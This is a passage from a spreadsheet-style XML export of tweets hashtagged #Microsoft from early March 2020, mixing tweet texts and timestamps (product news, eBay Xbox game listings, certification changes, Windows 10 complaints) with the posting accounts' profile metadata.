    <t>Mon Mar 02 02:02:18 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #microsoft #antivirus #android #ios #defender
Microsoft just announced that its bringing its Defender anti-virus to Android and iOS. The software  aims to make devices more secure with real-time protection against viruses, malware and spyware.</t>
  </si>
  <si>
    <t>{'id': 1224322893728878592, 'id_str': '1224322893728878592', 'name': 'CyberSec Total', 'screen_name': 'CyberTotal', 'location': '', 'description': '#cybersecurity #technology #cyberawareness #cybersafe', 'url': 'https://t.co/Eb6oIlduPo', 'entities': {'url': {'urls': [{'url': 'https://t.co/Eb6oIlduPo', 'expanded_url': 'https://cybersectotal.com/', 'display_url': 'cybersectotal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Mon Feb 03 13:26:17 +0000 2020', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1224373376883535872/LtJwStIy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224373376883535872/LtJwStIy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1224322893728878592/1580747692',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</si>
  <si>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02:00:55 +0000 2020</t>
  </si>
  <si>
    <t>Commission drawn by the great @itdontevenmata 
The Switch-Cube X
What if I owned Microsoft and Sony and made this back in 2000
#Microsoft 
#Sony 
#Nintendo 
#fanart https://t.co/mrLjTd9oyc</t>
  </si>
  <si>
    <t>{'id': 2618437523, 'id_str': '2618437523', 'name': '364wii', 'screen_name': '364wii', 'location': '', 'description': 'Just a guy who love getting commissions.', 'url': 'https://t.co/MNmJejbFlT', 'entities': {'url': {'urls': [{'url': 'https://t.co/MNmJejbFlT', 'expanded_url': 'https://www.deviantart.com/364wii', 'display_url': 'deviantart.com/364wii', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 192, 'friends_count': 634, 'listed_count': 13, 'created_at': 'Tue Jun 17 21:47:46 +0000 2014', 'favourites_count': 7436, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9165,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'http://pbs.twimg.com/profile_images/1064636207399747584/a3gkBjq9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1064636207399747584/a3gkBjq9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2618437523/1428008040',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</si>
  <si>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02:00:19 +0000 2020</t>
  </si>
  <si>
    <t>Thank you for a wonderful first day at #VSLive Las Vegas 2020 for our in-depth #HandsOnLabs #devtraining #developerconference #microsoft</t>
  </si>
  <si>
    <t>{'id': 18173537, 'id_str': '18173537', 'name': 'Visual Studio Live!', 'screen_name': 'VSLive', 'location': 'Nationwide', 'description': 'Join us for VSLive! Las Vegas - March 1-6, 2020', 'url': 'https://t.co/NZUFOzP9FH', 'entities': {'url': {'urls': [{'url': 'https://t.co/NZUFOzP9FH', 'expanded_url': 'https://vslive.com', 'display_url': 'vslive.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5528, 'friends_count': 2495, 'listed_count': 332, 'created_at': 'Tue Dec 16 21:37:37 +0000 2008', 'favourites_count': 965, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17752, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '101BE3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1108798672790151170/7iS7Magu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1108798672790151170/7iS7Magu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18173537/1579805955', 'profile_link_color': '4C2B8A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'B8BAE0', 'profile_text_color': '0A080A', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 01:59:11 +0000 2020</t>
  </si>
  <si>
    <t>Hey guys, it's #SeaOfThieves Time with @MrTLWolf and Friendos for @g1_Gamedays.  Pass it on and come on down!  #g1Nation #Rare #Microsoft #Xbox #XboxOne #SupportSmallStreamers
https://t.co/Ecvu2hQISl</t>
  </si>
  <si>
    <t>{'id': 364639577, 'id_str': '364639577', 'name': 'Ross Hoffman', 'screen_name': 'werdman24', 'location': 'South Carolina', 'description': "Gamer, pro wrestling fan, rocker, ScrewAttack g1, TMoFG 6 Champion.  Keep on keepin' on!!!", 'url': 'https://t.co/Yc7AQijYqa', 'entities': {'url': {'urls': [{'url': 'https://t.co/Yc7AQijYqa', 'expanded_url': 'http://battleforthenet.com', 'display_url': 'battleforthenet.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 502, 'friends_count': 711, 'listed_count': 24, 'created_at': 'Tue Aug 30 02:39:42 +0000 2011', 'favourites_count': 11849, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 94417,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'http://pbs.twimg.com/profile_images/859082508444606467/9lqZYtcB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/859082508444606467/9lqZYtcB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/364639577/1485213219',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</si>
  <si>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01:56:38 +0000 2020</t>
  </si>
  <si>
    <t>XBOX 360 Lost Odyssey 4 Discs Complete and Tested! https://t.co/BuTyQNoM9F #ebay @ebay #Xbox #xbox360 #Microsoft #LostOdyssey #gaming #videogames #complete #tested #4Discs https://t.co/D8dXMQSOBQ</t>
  </si>
  <si>
    <t>{'id': 3607451894, 'id_str': '3607451894', 'name': 'Thrifty Girl', 'screen_name': 'ThriftyGirl2015', 'location': 'Canada', 'description': 'To RT click my likes :) Come &amp; check out my eBay store (https://t.co/e8CcYsrMV8)- 100% feedback, top rated &amp; power seller!', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/e8CcYsrMV8', 'expanded_url': 'http://stores.ebay.ca/graingersthriftytreasures/', 'display_url': 'stores.ebay.ca/graingersthrifâ€¦', 'indices': [56, 79]}]}}, 'protected': False, 'followers_count': 1049, 'friends_count': 812, 'listed_count': 122, 'created_at': 'Fri Sep 18 17:54:41 +0000 2015', 'favourites_count': 8145, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11900,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'http://pbs.twimg.com/profile_images/894690146578296836/saNwV73e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/894690146578296836/saNwV73e_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3607451894/1509306121',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</si>
  <si>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Mon Mar 02 01:45:18 +0000 2020</t>
  </si>
  <si>
    <t>Our February meetup! 
We had a great time with the attendees working hands-on on azure 
The attendees were super charged! 
 #microsoftazure #cloud  #microsoft #cloudcomputing #Azure https://t.co/j2Vadkc4wJ</t>
  </si>
  <si>
    <t>{'id': 1037326114702729217, 'id_str': '1037326114702729217', 'name': '\\/ /\\ |\\| |] Â£ \\/ ðŸ˜Ž', 'screen_name': 'iamvandathron', 'location': 'Lagos, Nigeria', 'description': 'Front-end developer @mercatorng \nlover of @angular . Instructor #dscFUTA\n Java | Angular | Flutter.  C# beginner \n\nA Cybersecurity student', 'url': 'https://t.co/3q3Yju6Vtc', 'entities': {'url': {'urls': [{'url': 'https://t.co/3q3Yju6Vtc', 'expanded_url': 'https://www.linkedin.com/in/tosin-akinnagbe-8a3399166', 'display_url': 'linkedin.com/in/tosin-akinnâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 149, 'friends_count': 336, 'listed_count': 0, 'created_at': 'Wed Sep 05 13:06:33 +0000 2018', 'favourites_count': 1231, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 508, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231603052546809856/vvGI1kJE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231603052546809856/vvGI1kJE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1037326114702729217/1545466383',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</si>
  <si>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01:44:59 +0000 2020</t>
  </si>
  <si>
    <t>XBOX 360 The Witcher 2 Assassins of Kings Enhanced Edition Silver Box Complete and Tested https://t.co/GqPUY0pUzx #ebay @ebay #XBOX #Microsoft #Xbox360 #Witcher #TheWitcher2 #TheWitcher #AssassinsofKings #EnhancedEdition #SilverBox #videogames #gaming #complete #tested https://t.co/jR0amT4Qfa</t>
  </si>
  <si>
    <t>Mon Mar 02 01:44:39 +0000 2020</t>
  </si>
  <si>
    <t>#Apple #MacBookAir vs  #Microsoft #SurfaceLaptot 3. Sound Quality test. #Surface wins. https://t.co/PDPkJ5KOm9</t>
  </si>
  <si>
    <t>{'id': 12688342, 'id_str': '12688342', 'name': 'WarNov â˜', 'screen_name': 'WarNov', 'location': 'Bogota', 'description': 'Azure Solutions Architect at Microsoft. I love helping software enterprises grow in the Cloud. I race cars, a bicycle and now a drone.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3121, 'friends_count': 82, 'listed_count': 145, 'created_at': 'Fri Jan 25 16:43:09 +0000 2008', 'favourites_count': 591, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21627,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'http://pbs.twimg.com/profile_images/1232872459109642241/VMTqyd96_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232872459109642241/VMTqyd96_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/12688342/1555981708', 'profile_link_color': '1C9937',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</si>
  <si>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Mon Mar 02 01:44:28 +0000 2020</t>
  </si>
  <si>
    <t>#msteams #office365 #transformaciondigital 
#microsoft #udemy #cursos #colaboracion #training #digitaltransformation #udemy
#productividad 
Curso Completo MS Teams
https://t.co/LrArUfBsnH</t>
  </si>
  <si>
    <t>{'id': 1139944365072297985, 'id_str': '1139944365072297985', 'name': 'LeboPromo', 'screen_name': 'LeboPromo', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Sat Jun 15 17:14:50 +0000 2019', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 170, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1139967392136781824/FYXHdKbw_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1139967392136781824/FYXHdKbw_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1139944365072297985/1560624396',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</si>
  <si>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01:42:23 +0000 2020</t>
  </si>
  <si>
    <t>XBOX 360 UFC Undisputed 3 Complete and Tested NFR https://t.co/IW7Ibjk5oL #ebay @ebay #ebay @ebay #XBOX #Microsoft #Xbox360 #UFC #undisputed #undisputed3 #NFR #fighting #martialarts #videogames #gaming #complete #tested https://t.co/v8KXOyiW4W</t>
  </si>
  <si>
    <t>Mon Mar 02 01:39:03 +0000 2020</t>
  </si>
  <si>
    <t>XBOX 360 Perfect Dark Zero Limited Collectors Edition Steel Book Complete and Tested https://t.co/wZDxy9MiKr #ebay @ebay #ebay @ebay #XBOX #Microsoft #Xbox360 #PerfectDark #PerfectDarkZero #LimitedEdition #CollectorsEdition #SteelBook #videogames #gaming #complete #tested https://t.co/JxnYyJOI7J</t>
  </si>
  <si>
    <t>Mon Mar 02 01:36:03 +0000 2020</t>
  </si>
  <si>
    <t>XBOX 360 Divinity II The Dragon Knight Saga ATLUS Complete and Tested with Soundtrack https://t.co/a6ZWApKqsY #ebay @ebay #ebay @ebay #XBOX #Microsoft #Xbox360 #DivinityII #divinity #TheDragonKnightSaga #Dragon #Dragon #ATLUS #soundtrack #videogames #gaming #complete #tested https://t.co/56GE1aOb20</t>
  </si>
  <si>
    <t>Mon Mar 02 01:33:05 +0000 2020</t>
  </si>
  <si>
    <t>XBOX 360 Pac-Man and the Ghostly Adventures No Manual, tested https://t.co/CQPVPSSx4y #ebay @ebay #ebay @ebay #XBOX #Microsoft #Xbox360 #pacman #GhostlyAdventures #PacManandtheGhostlyAdventures #adventures #videogames #gaming #nomanual #tested https://t.co/dO8TiRmo3R</t>
  </si>
  <si>
    <t>Mon Mar 02 01:31:30 +0000 2020</t>
  </si>
  <si>
    <t>Hi friends, seen a few MVPs say theyre canceling their plans to attend #MVPSummit. Just wanted to say I will be attending, so long as #Microsoft is holding the event. See you all soon! #MVPBuzz</t>
  </si>
  <si>
    <t>Mon Mar 02 01:29:59 +0000 2020</t>
  </si>
  <si>
    <t>Want to learn how to secure your application using #Azure Virtual Network? Heres a perfect guide https://t.co/BSsDd89kVi for you.
#Microsoft #cloud #AWS #CloudComputing #MondayMotivation #VirtualNetwork</t>
  </si>
  <si>
    <t>Mon Mar 02 01:29:42 +0000 2020</t>
  </si>
  <si>
    <t>XBOX 360 Facebreaker Complete and Tested https://t.co/vkiw9ofVr4 #ebay @ebay #XBOX #Microsoft #Xbox360 #Facebreaker #fighting #boxing  #videogames #gaming #complete #tested https://t.co/Y4lgnOwi2v</t>
  </si>
  <si>
    <t>Mon Mar 02 01:28:36 +0000 2020</t>
  </si>
  <si>
    <t>I hated this #Microsoft Windows feature and always changed to show all file extensions...https://t.co/4yM4VX4aG6</t>
  </si>
  <si>
    <t>{'id': 701530067910791168, 'id_str': '701530067910791168', 'name': 'Jim Dolinski', 'screen_name': 'jimdolinski', 'location': 'Papillion, NE', 'description': 'I write code, I like cars, I love my family', 'url': 'https://t.co/xl0peZ16LI', 'entities': {'url': {'urls': [{'url': 'https://t.co/xl0peZ16LI', 'expanded_url': 'http://www.jimdolinski.me', 'display_url': 'jimdolinski.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 129, 'friends_count': 384, 'listed_count': 26, 'created_at': 'Sun Feb 21 22:12:56 +0000 2016', 'favourites_count': 610, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1546, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/701615499323441153/v1XUz4Ir_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/701615499323441153/v1XUz4Ir_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/701530067910791168/1456373078',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</si>
  <si>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01:21:30 +0000 2020</t>
  </si>
  <si>
    <t>@MikeCarlton01 After months of #Microsoft coercion, I "upgraded" to #Windows10 in 2016. My previously perfect ThinkPad was never the same again. After years of MS coercion, I moved to cloud-based #Office365 package.  Hostage-taking account-based software-as-a-"service" = contempt for consumers.</t>
  </si>
  <si>
    <t>{'id': 2253103538, 'id_str': '2253103538', 'name': 'Titus Oates', 'screen_name': 'worldofbastards', 'location': '', 'description': 'A Quiet Australian', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Thu Dec 19 06:48:15 +0000 2013', 'favourites_count': 100, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 285,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'http://pbs.twimg.com/profile_images/1099665552228794369/tvwokRPK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1099665552228794369/tvwokRPK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2253103538/1389757164',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</si>
  <si>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01:16:53 +0000 2020</t>
  </si>
  <si>
    <t>@MikeCarlton01 #MicrosoftWindows10 update not updating as usual.. every time I sit down to the desktop I have to undo the half-arsed update freeze.. PITA.. my young adult kids wouldn't touch #Microsoft.. only use #Mac.</t>
  </si>
  <si>
    <t>{'id': 2810441094, 'id_str': '2810441094', 'name': 'ðŸ’§Veritas', 'screen_name': 'jarro56', 'location': 'Sydney NSW Australia', 'description': 'The truth will make you fearless Atheist Hate lying corrupt conservative curs Inherited privilege &amp; faith based hypocrisy-long live the Republic of Australia!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1405, 'friends_count': 1397, 'listed_count': 25, 'created_at': 'Mon Sep 15 02:05:56 +0000 2014', 'favourites_count': 14239, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33647, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9266CC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227157095260119040/8tPTeIP2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227157095260119040/8tPTeIP2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2810441094/1578613606', 'profile_link_color': '3B94D9',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</si>
  <si>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Mon Mar 02 01:10:05 +0000 2020</t>
  </si>
  <si>
    <t>For those living in SF Bay area (or some parts of USA?), you can use your library card to learn more from #skillsoft which has a lot of learning resources for FREE !  Some of their contents include, #kubernetes, #ITIL, #CISA, #Microsoft, #python, #cloud,...https://t.co/sEUAd0z2q2</t>
  </si>
  <si>
    <t>{'id': 611519946, 'id_str': '611519946', 'name': 'Walter Lee', 'screen_name': 'WalterLee16', 'location': 'San Francisco, CA', 'description': 'Enjoy Fun, Clouds, Chatbots, AI/ML, Devops, SRE, k8s, Istio, JS, Java, CDN, Web, App. Opinions are my own and not the views of my employer.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 267, 'friends_count': 1333, 'listed_count': 12, 'created_at': 'Mon Jun 18 06:17:28 +0000 2012', 'favourites_count': 3345, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1462, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'A4B45D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/608024004620722176/VKREtnwq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/608024004620722176/VKREtnwq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/611519946/1433799194', 'profile_link_color': '635026', 'profile_sidebar_border_color': 'A4B45D', 'profile_sidebar_fill_color': 'CEDBD7', 'profile_text_color': '8C9C43', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 01:00:15 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/GyduynpDu5</t>
  </si>
  <si>
    <t>Mon Mar 02 01:00:00 +0000 2020</t>
  </si>
  <si>
    <t>$VERB  #Partners #InteractiveVideo
#CloudPartners #Salesforce #Microsoft #Integrations
https://t.co/0YCHhOABsE https://t.co/vtnsRP8tvz</t>
  </si>
  <si>
    <t>We are Hiring! Are you our next Office 365 Cloud Security Consultant?
We are a fully remote, US-based company. Learn more: https://t.co/DBgwoDD2vy
#microsoft #office365 #security #consulting #jobs #growwithus #applynow #jobsearch #jobposting #nowhiring #joinourteam https://t.co/DxAinJB9D8</t>
  </si>
  <si>
    <t>Mon Mar 02 00:51:31 +0000 2020</t>
  </si>
  <si>
    <t>Blue Cedar and Microsoft enable Intune users to connect from managed mobile apps to data sources #mobile #microsoft https://t.co/LUAoSKGlx3</t>
  </si>
  <si>
    <t>Mon Mar 02 00:49:34 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 00:49:33 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 00:33:59 +0000 2020</t>
  </si>
  <si>
    <t>Cisco ushers in a bright new age of bridges https://t.co/gihYuwMO9a For more info: https://t.co/9oxHasHMgh #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto #business #tech https://t.co/Vy6ignvtSv</t>
  </si>
  <si>
    <t>Mon Mar 02 00:32:32 +0000 2020</t>
  </si>
  <si>
    <t>I wanna know everything about nude competitions #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 00:25:52 +0000 2020</t>
  </si>
  <si>
    <t>First #Cisco, now #Microsoft announced their #certpocalypse. They are getting rid of pretty much all their certifications and focusing on their Azure roles certs. If you're studying or planning to study for MCSA, MCSE, MCSD cert, you might as well scrap that &amp;amp; look at Azure certs</t>
  </si>
  <si>
    <t>{'id': 1288824691, 'id_str': '1288824691', 'name': 'Davin Jackson', 'screen_name': 'Djax_Alpha', 'location': 'Georgia, USA', 'description': 'Dad | Husband | #Vet | #Hacker | #CyberSecurity Professional \n#Blogger / Content Creator @ Alpha CyberSecurity \nViews are my own\nhttps://t.co/KOX2zgFoyI', 'url': 'https://t.co/lk9TDyxP9I', 'entities': {'url': {'urls': [{'url': 'https://t.co/lk9TDyxP9I', 'expanded_url': 'https://alphacybersecurity.tech', 'display_url': 'alphacybersecurity.tech', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/KOX2zgFoyI', 'expanded_url': 'http://instagram.com/djax_alpha', 'display_url': 'instagram.com/djax_alpha', 'indices': [129, 152]}]}}, 'protected': False, 'followers_count': 1744, 'friends_count': 741, 'listed_count': 29, 'created_at': 'Fri Mar 22 14:18:53 +0000 2013', 'favourites_count': 2477, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3457,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'http://pbs.twimg.com/profile_images/1151951613319372805/ZeHbL_qh_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151951613319372805/ZeHbL_qh_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1288824691/1571965040',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</si>
  <si>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Mon Mar 02 00:16:24 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 KB4535996 update issues and fixes. #Microsoft  https://t.co/FymViufMwl</t>
  </si>
  <si>
    <t>Mon Mar 02 00:11:21 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Duo could see a summer launch to catch up with the foldable market  
Read more: https://t.co/WGgkOdDGqH
#microsoft #foldable #tech #android https://t.co/StbVDtGxZZ</t>
  </si>
  <si>
    <t>{'id': 1225146661, 'id_str': '1225146661', 'name': 'Fionna Agomuoh', 'screen_name': 'techiesupreme', 'location': 'New York, USA', 'description': 'Tech. Writing. Astrology. Black Girl Things.\nEIC at https://t.co/YELsFet1B5\nFormer @SAI @IBTimes \nContact: fionna@techiesupreme.com', 'url': 'https://t.co/pBPRWLYw46', 'entities': {'url': {'urls': [{'url': 'https://t.co/pBPRWLYw46', 'expanded_url': 'https://www.instagram.com/techiesupreme/', 'display_url': 'instagram.com/techiesupreme/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/YELsFet1B5', 'expanded_url': 'http://TechieSupreme.com', 'display_url': 'TechieSupreme.com', 'indices': [52, 75]}]}}, 'protected': False, 'followers_count': 1823, 'friends_count': 765, 'listed_count': 73, 'created_at': 'Wed Feb 27 14:40:09 +0000 2013', 'favourites_count': 27294, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10468,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'http://pbs.twimg.com/profile_images/1124428213671874561/NbHZAD34_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1124428213671874561/NbHZAD34_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1225146661/1498401461',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</si>
  <si>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Mon Mar 02 00:09:51 +0000 2020</t>
  </si>
  <si>
    <t>AZ-304 #Microsoft #Azure Architect Design Certification Exam (New in 2020!)
https://t.co/DUIXDKFKKU</t>
  </si>
  <si>
    <t>Mon Mar 02 00:08:34 +0000 2020</t>
  </si>
  <si>
    <t>Warning Issued For Millions Of #Microsoft #Windows10 Users https://t.co/R4Tzmws7ny</t>
  </si>
  <si>
    <t>{'id': 189383050, 'id_str': '189383050', 'name': 'KRoshan', 'screen_name': 'kroshan4mobile', 'location': '', 'description': 'â€œThree keys to more abundant living: caring about others, daring for others, sharing with others.â€', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 212, 'friends_count': 1096, 'listed_count': 129, 'created_at': 'Sat Sep 11 03:11:17 +0000 2010', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16695,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'http://pbs.twimg.com/profile_images/638413442500530176/JB8s1BW-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/638413442500530176/JB8s1BW-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/189383050/1433242466', 'profile_link_color': '2F6ED4', 'profile_sidebar_border_color': '5ED4DC', 'profile_sidebar_fill_color': '2F6ED4', 'profile_text_color': '2F6ED4', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 00:08:04 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Wireless Controller - Blue by #Microsoft
Compatible with #XboxOne X, #Xbox One S, Xbox One, #Windows10
Includes Bluetooth technology for gaming on #Windows 10 PCs and tablets
Features a solid blue finish and textured grip
Click Here: https://t.co/Lo6jQD64xE https://t.co/g2DTY08TZO</t>
  </si>
  <si>
    <t>{'id': 1195561504403275776, 'id_str': '1195561504403275776', 'name': 'Briskstar Electronics', 'screen_name': 'briskstare', 'location': '', 'description': 'Sharing the latest trends and product offers. Visit my YouTube Channel.', 'url': 'https://t.co/UwOxtZImv9', 'entities': {'url': {'urls': [{'url': 'https://t.co/UwOxtZImv9', 'expanded_url': 'http://www.youtube.com/channel/UC3rPYWVNltL2EpPF0OTTXig', 'display_url': 'youtube.com/channel/UC3rPYâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 823, 'friends_count': 4677, 'listed_count': 6, 'created_at': 'Sat Nov 16 04:37:49 +0000 2019', 'favourites_count': 435, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 689, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1195561660129402880/ZxKSMLMM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195561660129402880/ZxKSMLMM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1195561504403275776/1573879191',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</si>
  <si>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00:07:32 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Wireless Controller - Blue by #Microsoft
Compatible with #XboxOne X, #Xbox One S, Xbox One, #Windows10
Includes Bluetooth technology for gaming on #Windows 10 PCs and tablets
Features a solid blue finish and textured grip
https://t.co/FDSPiy5gBJ</t>
  </si>
  <si>
    <t>Mon Mar 02 00:05:10 +0000 2020</t>
  </si>
  <si>
    <t>#Warning Issued For Millions Of #Microsoft #Windows10-Users https://t.co/F6p61FsWlp</t>
  </si>
  <si>
    <t>{'id': 257088949, 'id_str': '257088949', 'name': 'My Comfor', 'screen_name': 'mycomfor', 'location': 'deutscher Sprachraum', 'description': 'News and more 4 u / Medien Radar und Infotainment', 'url': 'http://t.co/VcAIHhT0ia', 'entities': {'url': {'urls': [{'url': 'http://t.co/VcAIHhT0ia', 'expanded_url': 'http://www.mycomfor.com', 'display_url': 'mycomfor.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 474, 'friends_count': 154, 'listed_count': 430, 'created_at': 'Thu Feb 24 18:12:42 +0000 2011', 'favourites_count': 40, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 213329, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EBEBEB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1254132835/3com_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1254132835/3com_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/257088949/1398629479', 'profile_link_color': 